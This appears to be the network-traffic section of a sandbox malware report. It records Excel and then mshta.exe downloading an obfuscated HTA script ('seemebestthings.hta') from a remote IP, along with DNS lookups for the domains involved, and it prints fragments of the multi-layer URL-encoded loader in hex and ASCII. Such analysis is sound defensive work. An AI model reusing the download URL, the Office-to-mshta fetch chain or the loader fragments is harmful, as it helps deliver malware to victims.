                                                                      Nov 28, 2024 07:28:18.497184038 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.497386932 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.497433901 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.499761105 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.499803066 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.499862909 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.499902964 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.502449989 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.502556086 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.502588987 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.502588987 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.505126953 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.505197048 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.505224943 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.505265951 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.507812977 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.507891893 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.508034945 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.508086920 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.510488033 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.510545969 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.510610104 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.510652065 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.513195992 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.513286114 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.513318062 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.513366938 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.515878916 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.515927076 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.515949011 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.516001940 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.518547058 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.518647909 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.518687963 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.518687963 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.521260023 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.521305084 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.521339893 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.521339893 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.523886919 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.523946047 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.523984909 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.524030924 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.526582956 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.526653051 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.526689053 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.526748896 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.529241085 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.529297113 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.529330015 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.529376030 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.531939983 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.531997919 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.532040119 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.532083988 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.534616947 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.534671068 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.534719944 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.534765005 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.588527918 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.588579893 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.588619947 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.589055061 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.589926958 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.590020895 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.590069056 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.590114117 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.592519045 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.592559099 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:22.879293919 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:22.879365921 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:25.954195023 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:25.954257011 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:25.954329014 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:25.977226019 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:25.977245092 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:26.928174019 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:27.813416004 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:27.813606024 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:27.818326950 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:27.818340063 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:27.818620920 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:27.878201962 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:27.923330069 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:28.292267084 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:28.301137924 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:28.301250935 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:28.304003000 CET49168443192.168.2.22193.30.119.205

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 28, 2024 07:27:57.274409056 CET5456253192.168.2.228.8.8.8
                                                                      Nov 28, 2024 07:27:57.531128883 CET53545628.8.8.8192.168.2.22
                                                                      Nov 28, 2024 07:28:06.491487980 CET5291753192.168.2.228.8.8.8
                                                                      Nov 28, 2024 07:28:06.752451897 CET53529178.8.8.8192.168.2.22
                                                                      Nov 28, 2024 07:28:06.782918930 CET5291753192.168.2.228.8.8.8
                                                                      Nov 28, 2024 07:28:07.050187111 CET53529178.8.8.8192.168.2.22
                                                                      Nov 28, 2024 07:28:07.068228006 CET5291753192.168.2.228.8.8.8
                                                                      Nov 28, 2024 07:28:07.190926075 CET53529178.8.8.8192.168.2.22
                                                                      Nov 28, 2024 07:28:25.305689096 CET6275153192.168.2.228.8.8.8
                                                                      Nov 28, 2024 07:28:25.687628984 CET53627518.8.8.8192.168.2.22
                                                                      Nov 28, 2024 07:28:25.701416016 CET5789353192.168.2.228.8.8.8
                                                                      Nov 28, 2024 07:28:25.951210976 CET53578938.8.8.8192.168.2.22

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 28, 2024 07:27:57.274409056 CET192.168.2.228.8.8.80xc1aaStandard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:06.491487980 CET192.168.2.228.8.8.80x43afStandard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:06.782918930 CET192.168.2.228.8.8.80x43afStandard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:07.068228006 CET192.168.2.228.8.8.80x43afStandard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:25.305689096 CET192.168.2.228.8.8.80xba08Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:25.701416016 CET192.168.2.228.8.8.80xc50aStandard query (0)3105.filemail.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 28, 2024 07:27:57.531128883 CET8.8.8.8192.168.2.220xc1aaNo error (0)ljg.cl152.231.117.86A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:06.752451897 CET8.8.8.8192.168.2.220x43afNo error (0)ljg.cl152.231.117.86A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:07.050187111 CET8.8.8.8192.168.2.220x43afNo error (0)ljg.cl152.231.117.86A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:07.190926075 CET8.8.8.8192.168.2.220x43afNo error (0)ljg.cl152.231.117.86A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:25.687628984 CET8.8.8.8192.168.2.220xba08No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:25.687628984 CET8.8.8.8192.168.2.220xba08No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:25.951210976 CET8.8.8.8192.168.2.220xc50aNo error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 28, 2024 07:28:25.951210976 CET8.8.8.8192.168.2.220xc50aNo error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • ljg.cl
                                                                      • 3105.filemail.com
                                                                      • 172.245.123.29

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.2249164172.245.123.29803620C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 07:28:04.629838943 CET349OUTGET /1343/erg/seemebestthings.hta HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 172.245.123.29
                                                                      Connection: Keep-Alive
                                                                      Nov 28, 2024 07:28:05.785815954 CET1236INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Nov 2024 06:28:05 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Wed, 27 Nov 2024 07:03:04 GMT
                                                                      ETag: "320bd-627df8e9c34e4"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 204989
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/hta
                                                                      Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 53 63 72 69 70 74 25 32 35 32 35 32 30 4c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 25 32 35 32 35 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 35 32 35 32 37 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 32 30 48 54 4d 4c 25 32 35 32 35 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 35 32 35 32 30 70 72 6f 76 69 64 65 64 25 32 35 32 35 32 30 62 79 25 32 35 32 35 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 35 32 35 32 30 2d 2d 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 [TRUNCATED]
                                                                      Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252527%2525253C%25252521%25252544%2525254F%25252543%25252554%25252559%25252550%25252545%25252520%25252568%25252574%2525256D%2525256C%2525253E%2525250A%2525253C%2525256D%25252565%25252574%25252561%25252520%25252568%25252574%25252574%25252570%2525252D%25252565%25252571%25252575%25252569%25252576%2525253D%25252522%25252558%2525252D%25252555%25252541%2525252D%25252543%2525256F%2525256D%25252570%25252561%25252574%25252569%25252562%2525256C%25252565%25252522%25252520%25252563%2525256F%2525256E%25252574%25252565%2525256E%25252574%2525253D%25252522%
                                                                      Nov 28, 2024 07:28:05.785836935 CET1236INData Raw: 32 35 32 35 32 35 34 39 25 32 35 32 35 32 35 34 35 25 32 35 32 35 32 35 33 44 25 32 35 32 35 32 35 34 35 25 32 35 32 35 32 35 36 44 25 32 35 32 35 32 35 37 35 25 32 35 32 35 32 35 36 43 25 32 35 32 35 32 35 36 31 25 32 35 32 35 32 35 37 34 25 32
                                                                      Data Ascii: 25252549%25252545%2525253D%25252545%2525256D%25252575%2525256C%25252561%25252574%25252565%25252549%25252545%25252538%25252522%25252520%2525253E%2525250A%2525253C%25252568%25252574%2525256D%2525256C%2525253E%2525250A%2525253C%25252562%2525256F%
                                                                      Nov 28, 2024 07:28:05.785846949 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                                                      Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                                                      Nov 28, 2024 07:28:05.785981894 CET1236INData Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                      Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                                                      Nov 28, 2024 07:28:05.786034107 CET1236INData Raw: 32 35 32 35 32 35 34 35 25 32 35 32 35 32 35 35 36 25 32 35 32 35 32 35 37 31 25 32 35 32 35 32 35 36 39 25 32 35 32 35 32 35 35 41 25 32 35 32 35 32 35 36 39 25 32 35 32 35 32 35 34 34 25 32 35 32 35 32 35 34 44 25 32 35 32 35 32 35 34 31 25 32
                                                                      Data Ascii: 25252545%25252556%25252571%25252569%2525255A%25252569%25252544%2525254D%25252541%25252566%2525257A%25252565%2525257A%25252570%2525254B%2525256F%25252542%25252542%25252568%2525254C%2525256C%25252546%2525254E%2525257A%2525256A%2525256B%25252553%
                                                                      Nov 28, 2024 07:28:05.786045074 CET1236INData Raw: 35 32 35 34 46 25 32 35 32 35 32 35 34 44 25 32 35 32 35 32 35 37 39 25 32 35 32 35 32 35 35 38 25 32 35 32 35 32 35 36 38 25 32 35 32 35 32 35 34 34 25 32 35 32 35 32 35 37 37 25 32 35 32 35 32 35 35 30 25 32 35 32 35 32 35 34 35 25 32 35 32 35
                                                                      Data Ascii: 5254F%2525254D%25252579%25252558%25252568%25252544%25252577%25252550%25252545%25252543%25252555%25252546%25252556%25252543%25252569%25252569%25252572%2525256D%25252573%25252562%2525254B%25252578%25252565%25252566%25252557%2525254D%25252548%252
                                                                      Nov 28, 2024 07:28:05.786268950 CET776INData Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                      Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                                                      Nov 28, 2024 07:28:05.786281109 CET1236INData Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                                                      Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
                                                                      Nov 28, 2024 07:28:05.786292076 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                                                      Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                                                      Nov 28, 2024 07:28:05.786303043 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                      Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                                                      Nov 28, 2024 07:28:05.906258106 CET1236INData Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                                                      Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.2249166172.245.123.29803948C:\Windows\System32\mshta.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 07:28:10.124236107 CET426OUTGET /1343/erg/seemebestthings.hta HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: fr-FR
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Range: bytes=8896-
                                                                      Connection: Keep-Alive
                                                                      Host: 172.245.123.29
                                                                      If-Range: "320bd-627df8e9c34e4"
                                                                      Nov 28, 2024 07:28:11.299926043 CET1236INHTTP/1.1 206 Partial Content
                                                                      Date: Thu, 28 Nov 2024 06:28:10 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Wed, 27 Nov 2024 07:03:04 GMT
                                                                      ETag: "320bd-627df8e9c34e4"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 196093
                                                                      Content-Range: bytes 8896-204988/204989
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/hta
                                                                      Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 [TRUNCATED]
                                                                      Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525
                                                                      Nov 28, 2024 07:28:11.299945116 CET1236INData Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                      Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252C%25252520%25252520%25252520%25252520%2525
                                                                      Nov 28, 2024 07:28:11.299957037 CET1236INData Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30
                                                                      Data Ascii: 0%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                                                      Nov 28, 2024 07:28:11.300055027 CET1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                                                      Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                      Nov 28, 2024 07:28:11.300067902 CET1236INData Raw: 32 35 35 32 25 32 35 32 35 32 35 36 45 25 32 35 32 35 32 35 37 32 25 32 35 32 35 32 35 37 37 25 32 35 32 35 32 35 35 31 25 32 35 32 35 32 35 34 32 25 32 35 32 35 32 35 36 32 25 32 35 32 35 32 35 36 37 25 32 35 32 35 32 35 34 41 25 32 35 32 35 32
                                                                      Data Ascii: 2552%2525256E%25252572%25252577%25252551%25252542%25252562%25252567%2525254A%2525257A%25252555%25252546%25252571%25252548%25252578%25252566%25252543%25252554%25252569%25252562%25252550%2525256E%25252550%25252557%25252561%25252570%25252559%2525
                                                                      Nov 28, 2024 07:28:11.300081968 CET1236INData Raw: 30 25 32 35 32 35 32 35 36 33 25 32 35 32 35 32 35 34 43 25 32 35 32 35 32 35 36 37 25 32 35 32 35 32 35 34 36 25 32 35 32 35 32 35 37 32 25 32 35 32 35 32 35 36 41 25 32 35 32 35 32 35 36 38 25 32 35 32 35 32 35 34 37 25 32 35 32 35 32 35 36 45
                                                                      Data Ascii: 0%25252563%2525254C%25252567%25252546%25252572%2525256A%25252568%25252547%2525256E%25252547%25252579%25252556%25252553%2525254E%25252545%25252572%25252542%2525256A%2525256C%25252563%25252554%25252557%2525254E%25252567%2525254D%25252570%2525256
                                                                      Nov 28, 2024 07:28:11.300307035 CET1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                                                      Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                      Nov 28, 2024 07:28:11.300319910 CET1236INData Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32
